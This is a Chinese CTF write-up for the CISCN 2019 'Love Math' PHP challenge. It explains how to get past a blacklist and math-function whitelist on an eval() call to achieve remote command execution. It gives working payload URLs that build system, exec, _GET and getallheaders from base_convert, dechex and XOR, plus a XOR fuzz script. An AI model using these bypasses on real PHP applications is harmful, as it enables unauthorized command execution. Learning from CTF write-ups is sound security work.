[BUUOJ记录] [CISCN 2019 初赛]Love Math

主要考察利用已有函数构造危险函数绕过,实现RCE。

进入题目给出源码:

<?php
error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET[‘c‘])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET[‘c‘];
    if (strlen($content) >= 80) {   //[NESTCTF 2019]Love Math2这里限制长度为60,用本题的异或Payload即可
        die("太长了不会算");
    }
    $blacklist = [‘ ‘, ‘\t‘, ‘\r‘, ‘\n‘,‘\‘‘, ‘"‘, ‘`‘, ‘\[‘, ‘\]‘];
    foreach ($blacklist as $blackitem) {
        if (preg_match(‘/‘ . $blackitem . ‘/m‘, $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = [‘abs‘, ‘acos‘, ‘acosh‘, ‘asin‘, ‘asinh‘, ‘atan2‘, ‘atan‘, ‘atanh‘, ‘base_convert‘, ‘bindec‘, ‘ceil‘, ‘cos‘, ‘cosh‘, ‘decbin‘, ‘dechex‘, ‘decoct‘, ‘deg2rad‘, ‘exp‘, ‘expm1‘, ‘floor‘, ‘fmod‘, ‘getrandmax‘, ‘hexdec‘, ‘hypot‘, ‘is_finite‘, ‘is_infinite‘, ‘is_nan‘, ‘lcg_value‘, ‘log10‘, ‘log1p‘, ‘log‘, ‘max‘, ‘min‘, ‘mt_getrandmax‘, ‘mt_rand‘, ‘mt_srand‘, ‘octdec‘, ‘pi‘, ‘pow‘, ‘rad2deg‘, ‘rand‘, ‘round‘, ‘sin‘, ‘sinh‘, ‘sqrt‘, ‘srand‘, ‘tan‘, ‘tanh‘];
    preg_match_all(‘/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/‘, $content, $used_funcs);
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval(‘echo ‘.$content.‘;‘);
} 

拿到题目先分析一下限制条件:

1.参数c字符数不能超过80个字符

2.不能含有空格,\t,\r,\n,\,单双引号,中括号

3.使用的单词/函数必须在白名单中

限制其实比较严,那么就看看我们可以使用的一些符号 $ ( ) { } = ; ^ 等,同时我们需要知道的是PHP中函数名也是字符串,可以当作变量名来使用,例如  $pi、$cos 都是合法变量名。

从可以使用的符号中,我们考虑的思路可以是利用数学函数构造变量拼接成动态函数执行命令,也可以考虑使用异或来拼接出函数名。

总之重点就在于凑出函数或者是可以执行的命令。

前置知识点

PHP函数:

scandir() 函数:返回指定目录中的文件和目录的数组。
base_convert() 函数:在任意进制之间转换数字。
dechex() 函数:把十进制转换为十六进制。
hex2bin() 函数:把十六进制值的字符串转换为 ASCII 字符。
var_dump() :函数用于输出变量的相关信息。
readfile() 函数:输出一个文件。该函数读入一个文件并写入到输出缓冲。若成功,则返回从文件中读入的字节数。若失败,则返回 false。您可以通过 @readfile() 形式调用该函数,来隐藏错误信息。
语法:readfile(filename,include_path,context)

动态(可变)函数

PHP中可以把函数名通过字符串的方式传递给一个变量,然后通过此变量动态调用函数,例如: $a = "assert"; $a."(...)";

PHP 支持可变函数的概念。这意味着如果一个变量名后有圆括号,PHP 将寻找与变量的值同名的函数,并且尝试执行它。可变函数可以用来实现包括回调函数,函数表在内的一些用途。  可变函数不能用于例如 eval() , echo , print , unset() , isset() , empty() , include() , require()  以及类似的语言结构。需要使用自己的包装函数来将这些结构用作可变函数。

php中函数名默认为字符串

例如本题白名单中的asinh和pi可以直接异或,这就增加了构造字符的选择

引用自https://www.cnblogs.com/wangtanzhi/p/12246731.html

利用数学函数运算得到函数和命令

先说第一种思路,我们可以利用数学函数来运算得到函数名和命令,使用动态函数来执行命令

拼凑出_GET利用其他参数RCE

/index.php?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=<command>

分析:

base_convert(37907361743,10,36) => "hex2bin"
dechex(1598506324) => "5f474554"
$pi=hex2bin("5f474554") => $pi="_GET"   //hex2bin将一串16进制数转换为二进制字符串
($$pi){pi}(($$pi){abs}) => ($_GET){pi}($_GET){abs}  //{}可以代替[]

拼凑出getallheaders利用HeaderRCE

getallheaders — 获取全部 HTTP 请求头信息

getallheaders用法可以参考:https://www.php.net/manual/zh/function.getallheaders.php

/index.php?c=$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})

在HTTP请求的Header中直接添加命令即可

分析:

base_convert(696468,10,36) => "exec"
$pi(8768397090111664438,10,30) => "getallheaders"
exec(getallheaders(){1})
//操作xx和yy,中间用逗号隔开,echo都能输出
echo xx,yy

拼凑出exec、system等命令执行函数直接RCE

/index.php?c=($pi=base_convert)(22950,23,34)($pi(76478043844,9,34)(dechex(109270211257898)))
//分析:exec(‘hex2bin(dechex(109270211257898))‘) => exec(‘cat f*‘)

/index.php?c=base_convert(1751504350,10,36)(base_convert(15941,10,36).(dechex(16)^asinh^pi))
//分析:system(‘cat‘.dechex(16)^asinh^pi) => system(‘cat *‘)

利用异或得到函数名和命令

放出Mustapha Mond师傅的Fuzz脚本:

<?php
$payload = [‘abs‘, ‘acos‘, ‘acosh‘, ‘asin‘, ‘asinh‘, ‘atan2‘, ‘atan‘, ‘atanh‘,  ‘bindec‘, ‘ceil‘, ‘cos‘, ‘cosh‘, ‘decbin‘ , ‘decoct‘, ‘deg2rad‘, ‘exp‘, ‘expm1‘, ‘floor‘, ‘fmod‘, ‘getrandmax‘, ‘hexdec‘, ‘hypot‘, ‘is_finite‘, ‘is_infinite‘, ‘is_nan‘, ‘lcg_value‘, ‘log10‘, ‘log1p‘, ‘log‘, ‘max‘, ‘min‘, ‘mt_getrandmax‘, ‘mt_rand‘, ‘mt_srand‘, ‘octdec‘, ‘pi‘, ‘pow‘, ‘rad2deg‘, ‘rand‘, ‘round‘, ‘sin‘, ‘sinh‘, ‘sqrt‘, ‘srand‘, ‘tan‘, ‘tanh‘];
for($k=1;$k<=sizeof($payload);$k++){
    for($i = 0;$i < 9; $i++){
        for($j = 0;$j <=9;$j++){
            $exp = $payload[$k] ^ $i.$j;
            echo($payload[$k]."^$i$j"."==>$exp");
            echo "<br />";
        }
    }
}

利用该脚本我们可以利用异或构造出Payload:

/index.php?c=$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=<command>

[NESTCTF 2019]Love Math 2限制字符长度为60,用异或的Payload即可读取,两道题核心考点都是一样的

参考链接:

https://www.cnblogs.com/20175211lyz/p/11588219.html

https://www.cnblogs.com/wangtanzhi/p/12246731.html

原文地址:https://www.cnblogs.com/yesec/p/12664136.html

时间: 2024-10-03 14:39:04

[BUUOJ记录] [CISCN 2019 初赛]Love Math的相关文章

[CISCN 2019 初赛]Love Math

0x00 知识点 PHP函数: scandir() 函数:返回指定目录中的文件和目录的数组. base_convert() 函数:在任意进制之间转换数字. dechex() 函数:把十进制转换为十六进制. hex2bin() 函数:把十六进制值的字符串转换为 ASCII 字符. var_dump()?:函数用于输出变量的相关信息. readfile() 函数:输出一个文件.该函数读入一个文件并写入到输出缓冲.若成功,则返回从文件中读入的字节数.若失败,则返回 false.您可以通过 @readf

[BUUOJ记录] [GYCTF]EasyThinking

主要考察ThinkPHP6.0的一个任意文件写入的CVE以及突破disable_function的方法. ThinkPHP6.0.0任意文件操作漏洞 理论分析 进入题目是一个简单的操作页面,dirmap扫出来www.zip源码泄露: 下载下来看一下源码目录: 很明显的ThinkPHP框架,让网页随便报个错看看版本: 发现版本为6.0.0,一般线上CTF题目中出现ThinkPHP这种框架时,多是考察近期该框架爆出的通用漏洞,像是XCTF外卡赛“高校战‘疫’”的PHP-UAF便是考察了一个PHP近期

[BUUOJ记录] [强网杯 2019]随便注(三种方法)

本题主要考察堆叠注入,算是比较经典的一道题,在i春秋GYCTF中也出现了本题的升级版 猜测这里的MySQL语句结构应该是: select * from words where id='$inject'; 构造Payload:用单引号+分号闭合前面的语句,插入SQL语句,再用注释符注释掉后面的语句即可 先列出所有数据库: 1';show databases;# 得到: array(1) { [0]=> string(11) "ctftraining" } array(1) { [0

苏州大学2020考研记录(2019.3-2020.2.24)

我记得上一届有个学长也给我分享了一篇考研总结文档 我希望看到这篇文章的你,能有所收获.高效备考.少走点弯路.少踏点坑,冲鸭! 1.3 月初开始准备(大神当然不需要从介个时候开始,但是窝是小菜鸡) 不要盲目考研!不要从众考研!看清形势.看清自己. 或许你的本科学历及知识技能体系已经能让你够到理想的工作.或许了解一下研究生的日常你会被劝退的.或许从一开始就应该冲一下保研.意志不够坚定也请早日放弃(等秋招时 9 月后身边同学已经拿到心仪 offer 了.跟寄几差不多的同学都冲上保研了.而且宝贵的暑假已

[BUUOJ记录] [HCTF 2018]WarmUp

BUUOJ Web的第一道题,其实是很有质量的一道题,但是不知道为什么成了Solved最多的题目,也被师傅们笑称是“劝退题”,这道题的原型应该是来自于phpMyadmin的一个文件包含漏洞(CVE-2018-12613) 本文旨在分析这道题牵扯到的知识点以及解体思路,想直接看WriteUp拿Flag的师傅可以看看其他文章 解题过程 解题思路 进入题目查看源代码发现提示: 跟进source.php得到源代码: <?php highlight_file(__FILE__); class emmm {

scoi刷题记录(2019/04/07)

scoi2005 繁忙的都市 扫雷 互不侵犯 scoi2006 zh_tree scoi2007 排列 scoi2009 最长距离 生日礼物 scoi2010 幸运数字 scoi2011 糖果 scoi2012 喵星球上的点名 原文地址:https://www.cnblogs.com/Achensy/p/10664044.html

问题记录-(2019/11/5)

坐标变换-旋转(我们把点云原坐标系称为世界坐标系,把以本身正方向得到的坐标系称为 基坐标系) 让点云cloud 旋转到与坐标轴重回,且质心位于世界坐标系原点: 1.由cloud 本身参数求得质心,获得协方差矩阵,由协方差矩阵solver 得到 vectors 和 values, 使得vectors 正交化,得到点云主方向极坐标,也是由cloud世界坐标到基坐标的旋转矩阵, 2.点云旋转至世界坐轴系重回即为基坐标向世界坐标系旋转.求仿射变换矩阵. Eigen::Matrix4f transfrom

[BUUOJ记录] [ACTF2020 新生赛]Upload

//简单的上传题,考察绕过前端Js验证,phtml拓展名的应用 打开题目点亮小灯泡后可以看到一个上传点 传一个php测试一下: 发现有文件拓展名检查,F12发现是Js前端验证: 审查元素直接删掉,继续上传PHP文件测试: 发现还是被过滤了,应该是后端还有一次验证,换成phtml文件测试,phtml文件代码如下: GIF89a //习惯在文件前加上GIF89a来绕过PHP getimagesize的检查,这道题中有无皆可 <script language='php'>@eval($_POST['

项目记录

max3490 接4线是全双工通信,2线是半双工通信,3.3V.max3490可以实现rs422或rs485串口通信时的电平转换,ttl电平很低,与外界通信有时候电平不够,所以要有一个器件(max3490)将ttl电平转换成另一个电平级别:为什么输入ttl电平,可以输出很大的差分电压?因为max3490器件是有源器件,它自己工作的时候需要3.3v的电压供电,这样产生高电压就很容易了:再比如平时的运算放大器741,画电路图就三个接口,实际器件都是有源器件,要连接供电电压VCC的看门狗分为软件看门狗